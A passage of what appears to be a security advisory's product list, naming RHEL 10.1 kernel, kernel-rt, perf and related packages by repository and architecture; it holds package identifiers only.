"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
